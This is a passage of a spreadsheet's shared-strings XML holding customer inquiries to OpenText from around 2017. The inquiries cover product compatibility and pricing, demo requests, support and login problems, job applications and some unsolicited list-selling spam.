O foco principal em nosso caso é a gestão de documentos técnicos (Autocad) e documentos associados ao ciclo de vida/manutenção de ativos de transmissão de energia elétrica (subestações, linhas, torres de transmissão, etc)._x000D_
Agradeço antecipadamente pela atenção.</t>
  </si>
  <si>
    <t>Purchase products Gupta Report Builder</t>
  </si>
  <si>
    <t>Hi,_x000D_
I'm in charge of software &amp; licences inventory at Montpellier Business School. We are currently upgrading all our computers to Windows 10 and Office 2016 (current versions are 7 and 2013)._x000D_
In this purpose, I'd like to ensure compliance with w10 &amp; o2016 for all the software we use._x000D_
So here is my questions : do you know about any compatibility issues regarding eDocs and Windows10 (+Office 2016 in case there are plugins or features involving Office, such as imports/exports...) ?_x000D_
I know Windows 10 shouldn't be a problem when it comes to a web application as there is nothing installed on the user's desktop, but still better ask than missing something - plus, there could be browser issues with Microfsoft Edge (pre-installed &amp; default browser with Windows 10)_x000D_
_x000D_
Thanks a lot for yoru feedback._x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are currently using the Caprese Faxpress Software and are trying to install it on a new computer so we can access our faxes.  I can't find the instillation CD and can't seem to find the download online.     I hope you can help, Thanks!</t>
  </si>
  <si>
    <t>My name is Mickal Avant, I am contacting Michelle Jackson to  provide four business days that I am available for a over the phone interview. Thursday, June 21st, 2017 at 9:00am - Thursday, 29th, 2017. Please contact me at 202-910-0429</t>
  </si>
  <si>
    <t xml:space="preserve">We currently have a contract that we are ending with a company that supplied us with Canon MFP's. The new company that we have acquired has begin installing Xerox MFP's. Compiled with our objective to remove as many analog lines as possible and the Xerox's ability to integrate the Rightfax application, we wanted to get a trial license to test the software. We were supplied with a Xerox  MFP (WorkCentre 7845) and want to test the application to determine if we want to purchase bulk licenses. Let me know if you can be of any assistance. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested to acquire email list of “Call Center/Customer Experience Professionals” from your target region? We deliver multi-verified email list for all your business relationship to enhance your organization's bottom line._x000D_
_x000D_
Target Industry:  _____________; Geography:  ______________; Job Title (Any):  _________________:_x000D_
_x000D_
Data included: Company Name, Contact Name, First Name, Last Name, Email Address, Title, Website, Address, Address 1, City, State, ZIP Code, Country, Phone Number, FAX Number, Employees size, Revenue ($ Mil), SIC Code and Industry._x000D_
_x000D_
Look forward to hear back from you. _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
The University of Waterloo is in the process of changing our reference check questions and format. It’s important that the due diligence is accurately completed to ensure that the candidate’s skills and experience are verified.  Since this company oversees many hires, I would like to know whether you are able to send your reference check template and offer any insight on the company’s reference check process to help further excel the University of Waterloo. I look forward to hearing back from you. _x000D_
_x000D_
Kindest Regards, _x000D_
_x000D_
Alaa Abdel| Talent Acquisition Assistant, Human Resources_x000D_
Human Resources | East Campus 1, 200 University Avenue West | Waterloo, Ontario | N2L 3G1_x000D_
519.888.4567 Ext. 37912_x000D_
https://uwaterloo.ca/careers/_x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>We currently run SharePoint as our EDRMS. We need to implement a solution that will allow us to proceed with the disposition of our documents that no longer have operational value. We would like to consider your solution to be used on the back-end for RM/Disposition. I was wondering if I could discuss this with someone from your organization in hopes to perhaps conduct a proof of concept._x000D_
_x000D_
Thanks_x000D_
_x000D_
Thibault</t>
  </si>
  <si>
    <t>I would query a fax solution to integrate with our Inventory system in order to fax the PO to supplier directly. Can CloudFax or RightFax handle it?</t>
  </si>
  <si>
    <t>I want to find out if the OpenText Bravia solution works with Office 365 for viewing CAD drawings?</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText course evaluation survey at surveymonkey.com: the iPod Nano drawing date is in the past (April 30, 2017).  Today is June 21, 2017. </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
We work with a large organisation in Quebec who needs to simplify documents injection in Livelink. They asked us to do that._x000D_
_x000D_
We have a software, Librex, to capture documents (like Kofax). Librex has multiples smart connectors to various systems and we want to add a connector to Livelink. We need to have the documentation to add documents in their Livelink installation. _x000D_
_x000D_
I see that you have Web Services for this and I also see LAPI. Where can I get the documentation ?_x000D_
_x000D_
Thanks._x000D_
_x000D_
Jacques Chartrand</t>
  </si>
  <si>
    <t xml:space="preserve">Want to work in this organisation. </t>
  </si>
  <si>
    <t>Our reference: Call  2205866_x000D_
Please specify this number always in the subject line or answer directly to this e-mail._x000D_
_x000D_
Dear Sir or Madam,_x000D_
_x000D_
_x000D_
Our customer SIEMENS AG has sent us the following request:_x000D_
_x000D_
1 x OpenText Enterprise Connect_x000D_
_x000D_
Could you please send us an offer with reseller conditions?_x000D_
_x000D_
I will be grateful if you can send me this information._x000D_
If you have any questions, please do not hesitate to contact me._x000D_
_x000D_
Yours sincerely,_x000D_
_x000D_
Your Siemens Sales Team_x000D_
___________________________________x000D_
COMPAREX AG_x000D_
Blochstraße 1_x000D_
04329 Leipzig_x000D_
E-Mail: Siemens@comparex-group.com_x000D_
Fax:     +49 341 2568 999_x000D_
_x000D_
Direct contact:_x000D_
Jörg Gettke_x000D_
Inside Sales Key Account_x000D_
Phone: +49 696 67786635_x000D_
E-Mail: Joerg.Gettke@comparex.de</t>
  </si>
  <si>
    <t>Is there a free desktop viewer for Windows (Imaging Windows Viewer) that can be downloaded? Thanks</t>
  </si>
  <si>
    <t>To whom it may concern_x000D_
_x000D_
Please provide me with the opportunity to have a conversation regarding OpenText for Sub-Saharan Africa and more specifically South Africa. The conversation is with a view to understanding; supporting, implementing, integrating and selling OpenText in South Africa. _x000D_
_x000D_
To provide you with some context of who I am, I was the co-founder of a company, Emerald Consulting (acquired in 2008). Emerald Consulting was the legal practice management solution of choice in Sub-Sahara and Africa, enabled by Thomson Reuters, Elite Practice Management ERP suite of products. Over the years, our drive and commitment in engaging with our clients ensured them of the greatest possible service and best solutions fit for their firm._x000D_
_x000D_
We established and certified our footprint in South Africa. Emerald Consulting successfully implemented Elite Enterprise ERP suite into the leading law firms (top 3/5) in South Africa (300+ timekeepers/attorneys), namely; Edward Nathan Sonnenbergs, Bowman Gilfillan and Webber Wentzel._x000D_
_x000D_
I lead the team that implemented, trained and integrated disparate cross platform applications and manual processes into streamline and automated systems to meet the requirements of each company/firm utilizing a derivative of OpenText (Metastorm eWork)._x000D_
_x000D_
I would appreciated an introduction to the right person at OpenText to have conversation regarding the above._x000D_
 _x000D_
Thank you I look forward to hearing from you._x000D_
_x000D_
Regards_x000D_
_x000D_
_x000D_
NATHAN LEWIN</t>
  </si>
  <si>
    <t xml:space="preserve">OpenText Contract Center RFP_x000D_
_x000D_
Bonjour,_x000D_
Dans le cadre d'un prochain appel d'offres qui sera lancé en vue d'une recherche de solution de gestion de contrats, pourriez-vous m'indiquer l'adresse email à laquelle envoyer le RFP._x000D_
Bien cordialement,_x000D_
Pierre Uzan_x000D_
</t>
  </si>
  <si>
    <t>Wartungsauftrag RC148046 / Einsatz Oracle DB Version 12.2 möglich?</t>
  </si>
  <si>
    <t>Interested in getting more information about potential partnership for building an integration connector between the Xillio platform and OpenText Teamsite.</t>
  </si>
  <si>
    <t>I have some questions regarding to PostgreSQL, from our client; which are from #1 - #6 as below:_x000D_
_x000D_
#1. DATEADD doesn't work in Content Server 7.3 PostgreSQL_x000D_
_x000D_
Description:_x000D_
select DATEADD(day, 30, DATE('4/20/2017 00:00:00')) as new_date FROM dm_docbase_config_x000D_
_x000D_
..._x000D_
_x000D_
[DM_QUERY_E_CURSOR_ERROR]error:  "A database error has occurred during the creation of a cursor (' STATE=42601, CODE=7, MSG=ERROR: syntax error at or near "to_timestamp";_x000D_
_x000D_
Error while executing the query_x000D_
_x000D_
')."_x000D_
_x000D_
 _x000D_
_x000D_
Note: this DQL work fine in CS 7.3 Oracle/MSSQL_x000D_
=============================================_x000D_
#2.Content Server 7.3 PostgreSQL doesn't handle empty parameter for an integer field_x000D_
_x000D_
Description:_x000D_
_x000D_
select * from dm_document where group_permit = ''_x000D_
_x000D_
..._x000D_
_x000D_
[DM_QUERY_E_CURSOR_ERROR]error:  "A database error has occurred during the creation of a cursor (' STATE=22P02, CODE=7, MSG=ERROR: invalid input syntax for integer: "";_x000D_
_x000D_
Error while executing the query_x000D_
_x000D_
')."_x000D_
_x000D_
 _x000D_
_x000D_
Note: this DQL work fine in CS 7.3 Oracle/MSSQL_x000D_
=============================================_x000D_
#3. Content Server 7.3 PostgreSQL doesn't handle function UPPER(integer)_x000D_
_x000D_
Description:_x000D_
_x000D_
select * from dm_document where UPPER(group_permit) LIKE UPPER('1')_x000D_
_x000D_
..._x000D_
_x000D_
[DM_QUERY_E_CURSOR_ERROR]error:  "A database error has occurred during the creation of a cursor (' STATE=42883, CODE=7, MSG=ERROR: function upper(integer) does not exist;_x000D_
_x000D_
Error while executing the query_x000D_
_x000D_
')."_x000D_
_x000D_
 _x000D_
_x000D_
Note: this DQL work fine in CS 7.3 Oracle/MSSQL_x000D_
=============================================_x000D_
#4. Inconsistancy DATEDIFF return value between Content Server 7.3 PostgreSQL and Oracle/MSSQL_x000D_
_x000D_
Description:_x000D_
_x000D_
Inconsistancy DATEDIFF return value between Content Server 7.3 PostgreSQL and Oracle/MSSQL._x000D_
_x000D_
DQL below return 2.5 in Oracle but 2 in PostgreSQL version_x000D_
_x000D_
 _x000D_
_x000D_
select DATEDIFF(day, date('5/18/2010 6:00:00'), date('5/20/2010 18:00:00')) as day_count FROM dm_docbase_config _x000D_
=============================================_x000D_
#5. R</t>
  </si>
  <si>
    <t>Dear Mr. Ali Saleh,_x000D_
_x000D_
I am trying to reach you, but don't have your email and phone number. Could you please email me your phone number and email detail. _x000D_
I have some urgent work and want to talk to you urgently._x000D_
_x000D_
Thanks_x000D_
_x000D_
Rajesh Lohana</t>
  </si>
  <si>
    <t>I would like to discuss an upgrade from our existing ICCM procust installed some 5 years ago to the latest product release, I alos would like to see what changes and improvements have been made over the last 5 years and what costs are involved in the upgrade</t>
  </si>
  <si>
    <t>Questions forwarded from our client about PostgreSQL</t>
  </si>
  <si>
    <t>Dear Sirs, _x000D_
_x000D_
I'm Thomas Ramé and I work at the Crédit Mutuel Arkéa (french bank and insurance group) as project manager for the Innovation unit. I'm currently waiting the Magellan's announcement in July but in the meantime I was wondering if you have planned to integrate an emotion recognizer into this project? (The equivalent at IBM is Watson Tone Analyzer)_x000D_
_x000D_
And I would like to be sure that the french language will be present in Magellan (natural language understanding...)._x000D_
_x000D_
I hope so much that Magellan will be as impressive as what the OpenText CEO said._x000D_
_x000D_
Don't hesitate to ask more question if needed (email prefered since I'm not always at my desk). _x000D_
_x000D_
Have a good day, _x000D_
_x000D_
Best regards,</t>
  </si>
  <si>
    <t>Sourcing Contract Management &amp; Matter Management Solution</t>
  </si>
  <si>
    <t>Wants help with integrating Rightfax with Cisco Core Manager.</t>
  </si>
  <si>
    <t>Looking at a Digital Asset Management solution for our Brand and Marketing team. Would like an initial discussion and look at a demo or evaluation option.</t>
  </si>
  <si>
    <t>renaming folders in alchemy</t>
  </si>
  <si>
    <t>Necesito información sobre Documentum, ojala me puedan contactar para poder conocer más el producto.</t>
  </si>
  <si>
    <t>Need to upgrade out fax solution and need to get some pricing</t>
  </si>
  <si>
    <t>Demo for web content management system</t>
  </si>
  <si>
    <t>We are retiring an instance of SAP and I am looking into data retention options.  While reviewing the Gartner report on Structured Data Archiving, OpenText stood out as a market leader for SAP archiving.  I’d like to possibly have a quick discussion and understand your pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a content management solution for our Company.  I would like to set up a call and / or a call with a demo for myself and one other team member from The National Lime and Stone Company.  Would you please return my email at your convenience so we might set up a time to talk?_x000D_
Thanks,_x000D_
Sheila Huber_x000D_
</t>
  </si>
  <si>
    <t>Hello, I just attended the OpenText training course in Atlanta for Ernst &amp; Young.  I would like access to the knowledge center (knowledge.opentext.com), but my current login does not have access.  Since EY is a partner with OpenText, I should be able to access the knowledge portal.  Thank you.</t>
  </si>
  <si>
    <t>Would you please let us know when the contract is up?  Also would you please let us know how to terminate it?_x000D_
_x000D_
Thank you!_x000D_
Satoko Kotera_x000D_
Office Manager_x000D_
Myers &amp; Company_x000D_
1530 Eastlake Avenue East_x000D_
Seattle, Washington 98102_x000D_
Telephone: (206) 398-1188, ext. 106_x000D_
E-Fax: (206) 400-1115_x000D_
www.Myers-Company.com_x000D_
www.BlackFishLaw.com</t>
  </si>
  <si>
    <t>Hello, i need to add a upc prefix to our GXS catalog R2648A.  Please confirm where to send the form. _x000D_
erica@mododoc.com</t>
  </si>
  <si>
    <t>Hello,_x000D_
When we are unable to login to the Judicom Application version 12.122. Each time we login we get "Server unavailable". This happens randomly on different computers and to different users. It does also happen when connected to different type of network._x000D_
_x000D_
What could be the cause?_x000D_
_x000D_
Thank you_x000D_
Patrick Matthews</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'm a Televisa's employee and we are interested in your product. If is possible, we are looking for a tool that fits all our necesities and concerns._x000D_
_x000D_
Could you please contact us in order to see a demostration of your product? _x000D_
Hoping to do business with your company._x000D_
_x000D_
Best,_x000D_
Alfredo González</t>
  </si>
  <si>
    <t>Looking for pricing for Documentum (on-prem), would also like a demo and/or trial if available.</t>
  </si>
  <si>
    <t xml:space="preserve">Is there any vacancy for java freshers 2016 passed out </t>
  </si>
  <si>
    <t>I AM INTERESTED IN ESTABLISHING A DOCUMENT MANAGEMENT AND STORAGE SYSTEM FOR MY LAW PRACTICE AND TITLE COMPANY</t>
  </si>
  <si>
    <t>Can you tell me which version this Redact It is? I need to know so I'm able to download it on my work computer._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Want your help to add "enterprise content management" product that we are licensed with.  Please check Dale.Colliver@tina.toyota-industries.com also incase of questions.</t>
  </si>
  <si>
    <t>I would like to learn more about your ECM and long-term archival solutions.</t>
  </si>
  <si>
    <t>I have 2 years of experience in java.Is there any requirement in your company please drop the mail or make a call.</t>
  </si>
  <si>
    <t>I would like access to the knowledge base, but I don't know if our contract qualifies. Thanks in advance</t>
  </si>
  <si>
    <t>To understand the latest SAP HANA compatible version of VIM and what it offers.</t>
  </si>
  <si>
    <t>Training Material needs assessment for our clients and ourselves, to upgrade both knowledge and work performance.</t>
  </si>
  <si>
    <t>Product information and demo</t>
  </si>
  <si>
    <t>May want to purchase Redact-it Desktop</t>
  </si>
  <si>
    <t xml:space="preserve">Could you send me a copy of renewal notice RC153310? Thanks. </t>
  </si>
  <si>
    <t>I'm looking to disucss our existing account/service/maintenance</t>
  </si>
  <si>
    <t>Log in password to be re-set - Thanks</t>
  </si>
  <si>
    <t>I sent in a request to talk to a Sales Rep last week with what we are trying to do. Can someone please contact me?</t>
  </si>
  <si>
    <t>we are experiencing an increasing number of customers who want to be billed via a platform like Ariba, Oildex, etc. whereby we populate the website with billing information (often unique fields by customer) and the information is transported to their ERP system.  The platform is then used to exchange updates like invoice rejections, acceptance, payment status.  We are finding the effort to populate the variety of information on the various platforms is highly manual and time-consuming.  Does OpenText offer automation in this space?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We would like to know if Documentum 5.3 is compatible with Microsoft Azure cloud platform._x000D_
_x000D_
Our current installation is Documentum 5.3 SP6, running on Windows Server 2008 R2 (database server: SQL Server 2005 on Windows Server 2003).  This installation is proposed to be moved to Microsoft Azure cloud platform._x000D_
_x000D_
Thanks_x000D_
Abdul</t>
  </si>
  <si>
    <t>I had been able to get into the HP Extream support website and would like to be able to get signed up for your OpenText support website._x000D_
_x000D_
Thanks_x000D_
_x000D_
Randy Bartholomew</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
I was wondering if your clients ever ask if you know anyone that can help with payment acceptance? _x000D_
Jet Pay is a full service Credit card processing company here in Carrollton. We have a very lucrative partner program I would love to talk with you about. _x000D_
Look forward to hearing from you._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are needing to move the software to a new server. Can I ask how we would go about doing this? _x000D_
Thank you _x000D_
Ben </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
ich bin aus dem Bereich Partnermanagement der Deutschen Post AG. Ich würde mich gerne mit einem Mitarbeiter aus ihrem Bereich Partnermanagement über eine mögliche strategische Kooperation unterhalten._x000D_
_x000D_
Bitte rufen Sie mich hierzu an._x000D_
_x000D_
VIelen Dank._x000D_
_x000D_
Sebastian Hochmuth</t>
  </si>
  <si>
    <t>Enquire about Easy link product. we are looking at migrating our existing GFI fax solution and evaluating other products. we get 1 million faxes from our customers in a month and would require appropriate solution with uptime, SLA and quality of faxes. Also the alerts to Fax lines when there is busy tone or service not available to be ascertained._x000D_
_x000D_
Regards_x000D_
Vivek.</t>
  </si>
  <si>
    <t>Bonjour_x000D_
_x000D_
Je souhaiterais savoir si la dernière version de fax2mail Toolbar est compatible avec office 2016_x000D_
_x000D_
Merci d'avance de votre reponse</t>
  </si>
  <si>
    <t>For the HR hiring team:_x000D_
This is Carlos Pereira._x000D_
I´ve applied for some sales jobs through your career site and, if possible I´d like to share some more information about my profile._x000D_
I come from a huge experience in the SaaS sales market around EMEA, in deep Spain, France and Portugal with specific ECM industry knowledge._x000D_
I speak fluent English, French, Spanish and, holding Telecomm Engineer degree plus MBA._x000D_
Hope hear from you soon_x000D_
Carlos</t>
  </si>
  <si>
    <t>Demande de support</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Support Team,_x000D_
_x000D_
We need to prepare a test environment for C4 PCS service, currently we have only productive instance. Do we need to pay extra license cost for the test instance, or it is included in the price of the productive instance?_x000D_
_x000D_
Thank you,_x000D_
David Maknics _x000D_
innogy IT Hungary_x000D_
</t>
  </si>
  <si>
    <t>Can i get a copy of our current contract.</t>
  </si>
  <si>
    <t xml:space="preserve">I think that we do have support but I do not have access. You should show Steve Zurek (szurek@paof.com) of Physician Associates of Florida. I will also need access. </t>
  </si>
  <si>
    <t>Porsche Cars GB Limited are currently using Opentext eDOCS in their legal department. Our current support partner will not be supporting us from the end of June. At the beginning of August Porsche will be moving from Office 2010 &amp; Lotus Notes to Office 2016 &amp; Outlook we are currently running eDocs ver 5.3 and need to understand what our options are for upgrading to support the migration. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">My company operate as software integrator for large companies in Italy_x000D_
_x000D_
We were asked to set a quotation for a major integration project for which we identified the need to use a BPM engine. The BPM engine should operate as a processes orchestrator._x000D_
We are therefore not interested in a standard solution in which costs are determined by users quantity, but rather on a bid that evaluates process instances triggered._x000D_
Our customer should leverage the BPM engine to activate between 30,000 and 50,000 daily transactions._x000D_
We would like to know if your system can be used in this way and cost for the number of transactions/instances previously defined._x000D_
In the quotation please consider a h24x365 Assistance Service._x000D_
I'll be waiting for your feedback_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
We are a leading Regulatory Affairs and Quality consultancy for the pharmaceutical industries, based in Israel. _x000D_
Our clients are leading global pharma and medical device manufacturers who delegate their Israel Regulatory and Quality activities to us._x000D_
_x000D_
We would like to inquire regarding implementing Documentum Life Sciences Solution Suite, in the cloud, for our business._x000D_
We would require approximately 20 users, with potential for an increase up to 40 users in the future._x000D_
_x000D_
Looking forward to hearing from you._x000D_
_x000D_
Best Regards,_x000D_
Alon Wagner_x000D_
BioPlan Ltd._x000D_
</t>
  </si>
  <si>
    <t>We would like a web demonstration of the OpenText Vendor Invoice Management.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you interested in acquiring Email list of 5,187 Attendees of DIA EXPO 2017? If yes, acquire this entire list with email address for flat $499. Lists will be delivered in an excel spread sheet within an hour. _x000D_
_x000D_
Our Standard terms and conditions for  DIA EXPO 2017 Attendees list –_x000D_
1) All records include contact name, company name, job title, postal address, telephone   number, industry vertical, employee size, Web URL and email address_x000D_
2) This list include 60 to 70 percent of attendees with complete contact details_x000D_
2) 90% email accuracy guaranteed and any  hard bounces more than 10% will be replaced_x000D_
3) Lists are delivered for your unlimited usage_x000D_
4) You will own the database_x000D_
5) Lists are delivered in XLS or CSV format_x000D_
_x000D_
Let me know  your thoughts and please refer me to the right person making decision in acquiring DIA EXPO 2017 attendees lists._x000D_
_x000D_
Regards,_x000D_
Jessica_x000D_
VP attendee list _x000D_
Discover Organizations and Executives_x000D_
PO box 47135_x000D_
Cheyenne_x000D_
WY 82001_x000D_
</t>
  </si>
  <si>
    <t>We need to migrate document/meta data form legacy system( Hummingbird Docs Open 4.0), please can you let us know what will be the charges for a migration tool?</t>
  </si>
  <si>
    <t xml:space="preserve">Vous attendiez l’opportunité d’agrandir votre clientèle ? De partager votre expérience et votre savoir-faire auprès de créateurs d’entreprises?  Profitez de cette opportunité… La 9iem édition du Carrefour des Créateurs 2017 approche. L’événement aura lieu le 31 octobre prochain à Lausanne au Swiss Tech convention Center (STCC)  avec nos +2500 visiteurs. C’est l'occasion de faire parler de vous en participant en tant qu’exposant au Carrefour des créateurs._x000D_
_x000D_
Cette journée sera notamment ponctuée d’une vingtaine de conférences sur des problématiques concrètes liées à l’entrepreneuriat telles que l’innovation, le financement, le crowd-funding, le marketing-mix, le business plan, la franchise, la reprise d’entreprise, etc… . Les visiteurs auront également la possibilité de rencontrer un panel de prestataires présents en qualités d’exposants ainsi que la possibilité de solliciter, sous la forme de speed meetings (rendez-vous spécialistes), l’expertise de spécialistes._x000D_
Plus d’informations sur www.carrefour-createurs.ch _x000D_
Je vous invite à me contacter sur enzo.disalvatore@genilem.ch afin que je puisse vous envoyer le dossier de présentation du Carrefour des Créateurs 2017._x000D_
Belle journée à vous,_x000D_
Enzo Di Salvatore_x000D_
</t>
  </si>
  <si>
    <t>Request to attend the conference on ECM in Toronto on 10-13 July 2017 and need procedure as well as an invitation from your side as pert of our motivation because we want to implement Electronic Content management within the Police and the conference will be of benefit to us.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,	_x000D_
_x000D_
I hope your company provides Lotus Notes Technology solutions. If yes, then we are here to help you._x000D_
_x000D_
We have 9,690 customers database Lotus Notes Technology from Europe._x000D_
_x000D_
Test files will be given to review the quality._x000D_
_x000D_
Would you like me to send more information?_x000D_
_x000D_
Thank you_x000D_
_x000D_
Regards,_x000D_
Rosa Paula_x000D_
(E):- rosa.paula@info-hub.online_x000D_
</t>
  </si>
  <si>
    <t>Boston Scientific uses OpenText and plans to invest and expand it as an enterprise application</t>
  </si>
  <si>
    <t>Hi, I applied for the role Ref#: 14907 Director Professional Services ANZ on 6 June and am following up on selection status._x000D_
regards_x000D_
Steve</t>
  </si>
  <si>
    <t xml:space="preserve">Problem with an app..._x000D_
When you upgraded your app back in about August 2016, it no longer worked on my iPhone or iPad. This is probably because my source did not upgrade their FirstClass server version. I had been able to use both by avoiding an upgrade from Apple. However, due to sloppy upgrades by me, I got upgraded so that now, this does not work on either my phone or pad. Before I switch to Google or some other email service, is there ANY way I could be sent an older version of the app that will work? I LOVE FirstClass and the idea of going to another platform is, to be honest, a real PITA. _x000D_
Ron </t>
  </si>
  <si>
    <t>please put my phone number on your do not call list.</t>
  </si>
  <si>
    <t>EDI offering</t>
  </si>
  <si>
    <t>I would like pricing to replace our outdated Faxpress 5000 unit.</t>
  </si>
  <si>
    <t>We desire to have an ECM solution that can work with the SAP ERP as well as outside SAP ERP._x000D_
SAP has proposed to implement using the 7018804 SAP Extended Enterprise Content Management by OpenText. We would like to know that the version of the ECM by Open Text being proposed to us is not just a run-time version that can be used only with SAP ERP._x000D_
Your guidance is therefore required to ensure that we obtain the right version of ECM by Open Text that will work with both SAP ERP and usable outside SAP._x000D_
_x000D_
Best regards._x000D_
_x000D_
www.ecowas.int</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for a faxing solution to be able to fax within Microsoft SharePoint 2013 for our Retirement Planning Administration Department. Our current faxing process is a 14-step process to fax stored documents when it should be a 3-step process for faxing. I would like to get some basic information of your offerings so that I can forward it on to our Senior Software Engineer. The best way to reach me is via e-mail._x000D_
_x000D_
Thank you,_x000D_
Maria Huerta </t>
  </si>
  <si>
    <t xml:space="preserve">Need to login catalog asap. Thank you. </t>
  </si>
  <si>
    <t>Interested in Content Management (CM) and Digital Asset Management (DAM) solutions.</t>
  </si>
  <si>
    <t xml:space="preserve">Looking to talk to sales for Opentext / Documentum. Have left several messages with no contact. </t>
  </si>
  <si>
    <t>We are getting notices from easylink in a box that we are not sending faxes from.</t>
  </si>
  <si>
    <t>Checking on Support for OpenText 16 on Oracle Linux 6.7 and 6.8 on the Oracle Exalogic Platforms (which runs the UEK kernel). Please advise. Thank you. _x000D_
Rgds, Margaret</t>
  </si>
  <si>
    <t>Wondering if Myriad software is still available.  Originally purchased one license from Infograph.</t>
  </si>
  <si>
    <t>training livelink developer in switzerland / germany</t>
  </si>
  <si>
    <t>Prezado(a),_x000D_
Gostaria de obter informações de licença do ACCELL/SQL._x000D_
_x000D_
Por favor, entre em contato o mais breve possível em dos meus contatos abaixo:_x000D_
Comercial : +55 21 2507-4321_x000D_
Celular      : +55 21 99124-1130_x000D_
_x000D_
Desde já agradeço sua atenção._x000D_
_x000D_
Licinio Teixeira</t>
  </si>
  <si>
    <t>Need assistance with embedding RIghtfax routing codes in Word template.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are an authorized HP partner, and we were looking for a designated point of contact. When I asked I was directed to this site, so I was wondering if you could help me?_x000D_
Thank you</t>
  </si>
  <si>
    <t>Cannot log into the site today. Asked for a Reset on the password and haven't received an email back. We have not changed our login and don't know why it isn't working now. Our last password change was done on 3/29/17. Thank you, Karen</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are currently working on a S/4 Hana implementation and for the Invoice Management we are looking at the possibility to implement the SAP VIM by OpenText, as a management tool._x000D_
_x000D_
In order to build the business case I need the following information:_x000D_
1. The installation (a quick guide and maybe the duration)_x000D_
2. How to obtain the licence and what are the costs involved in that._x000D_
3. Additional costs_x000D_
_x000D_
I hope someone would be able to answer this questions._x000D_
_x000D_
Thank you very much and I am looking forward to hearing back from you._x000D_
_x000D_
Best,_x000D_
Lucian Stefan</t>
  </si>
  <si>
    <t>job searchfor abroad</t>
  </si>
  <si>
    <t>Please provide a Voluntary Product Accessibility Template (VPAT) for WebXtender 8.1 and AppXtender Document Manager 8.1. We already own a license sold by CompuCom, Inc. Our internal review process now requires 508 or accessibility reviews. Thanks.</t>
  </si>
  <si>
    <t>Hallo,_x000D_
_x000D_
ich würde mir gerne bei Ihnen in Düsseldorf ein Demo zum Thema digitale Personalakte mit Documentum zeigen lassen._x000D_
_x000D_
Hintergrund: mein Kunde interessiert sich für das Thema, und ich möchte Documentum als Tool für digitale Personalakten besser verstehen. _x000D_
_x000D_
Ich bin in der Nähe der Düsseldorfer Niederlassung und könnte, kurzfristig innnerhalb von 15min vor Ort sein._x000D_
_x000D_
Wäre ein Demo möglich?_x000D_
_x000D_
Besten Dank &amp; Grüße,_x000D_
Dr. Daniel Ilg</t>
  </si>
  <si>
    <t xml:space="preserve">On behalf of an international organization combating violent extremism in Saudi Arabia, I am contacting for the third time to gauge interest in supporting an open source monitoring and collection capability for our organization._x000D_
_x000D_
Your suite of capabilities have been identified by our organization’s leadership as a potentially viable partner for supporting our mission needs. We are looking to issue an RFP and in order to share further information, we require that you sign an NDA to move further in the process._x000D_
_x000D_
Please respond to specify your level of interest no later than Friday, June 23rd, 17:00 GMT+3._x000D_
_x000D_
Thank you for your time. We look forward to your prompt reply. _x000D_
</t>
  </si>
  <si>
    <t>I want to know how I can use Microsoft Active Directory for user authentication. I use TD Mobile. I need sample codes or help documents. I could not find about this topic on help documents your web pages. thank you for help.</t>
  </si>
  <si>
    <t xml:space="preserve">Title: Regarding Partnership. _x000D_
Dear OpenText Biz Partner Manager,               _x000D_
My name is Jun, sales general manager of Ahnlab in Korea. It is very great to contact you. We are cyber security software/hardware company. It is very great to talk to you!        _x000D_
By the way, our company is selling cyber security software/hardware solutions.  And we are looking for partners in your market and we are very interested in having partnership with your company.     _x000D_
I’d like to introduce our best cyber security solutions to your company for your cyber safety. We are global Top10 cyber security company.  (Pls review our brochure for more details)       _x000D_
_x000D_
So, if possible, could you pls connect me to your IT team leader ? It would be really appreciate your help and co-operations!    _x000D_
_x000D_
Thank you.  _x000D_
Best Regards, Jun    _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve"> Hello and good morning_x000D_
_x000D_
I am Katie Smith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Katie Smith_x000D_
</t>
  </si>
  <si>
    <t>Access to documentation. Currently attending virtual training</t>
  </si>
  <si>
    <t xml:space="preserve">Respected Sir/Madam,_x000D_
_x000D_
Looking for opportunity to work in your company for any software positions._x000D_
_x000D_
Current: Indian citizen working as Software Engineer in South India from past 2 years in the field of software development, Testing and Documentation._x000D_
Previous: Worked for a period of 1 year as Intern in south India._x000D_
_x000D_
Education: Master's in Computers and Bachelors in Computers._x000D_
_x000D_
Willing to relocate to Canada from India._x000D_
_x000D_
looking for long term opportunity._x000D_
_x000D_
Salary as per company norms._x000D_
_x000D_
Regards_x000D_
Karthik Subramnaya_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear OpenText Team,_x000D_
_x000D_
I am Arun Kumar writing this communication from Aris Global Software Private Limited, Bangalore, India._x000D_
_x000D_
We wanted to know from where we can get the install set of BizManager 3.3(32 bit). We have BizManager 3.3(64 bit) with us but, we need  the 32 bit's install set._x000D_
_x000D_
Kindly request you to prvide information on this regard, which will be very helpful._x000D_
_x000D_
_x000D_
Thanks,_x000D_
Arun Kumar A S_x000D_
ArisGlobal Software Pvt. Ltd._x000D_
#19/2, 15th Cross, Dollars Colony, J.P. Nagar, 4th Phase_x000D_
Bengaluru, 560078_x000D_
Ph: +91.80.66212504 </t>
  </si>
  <si>
    <t>Auswahlprozess Digital Asset Management Tool</t>
  </si>
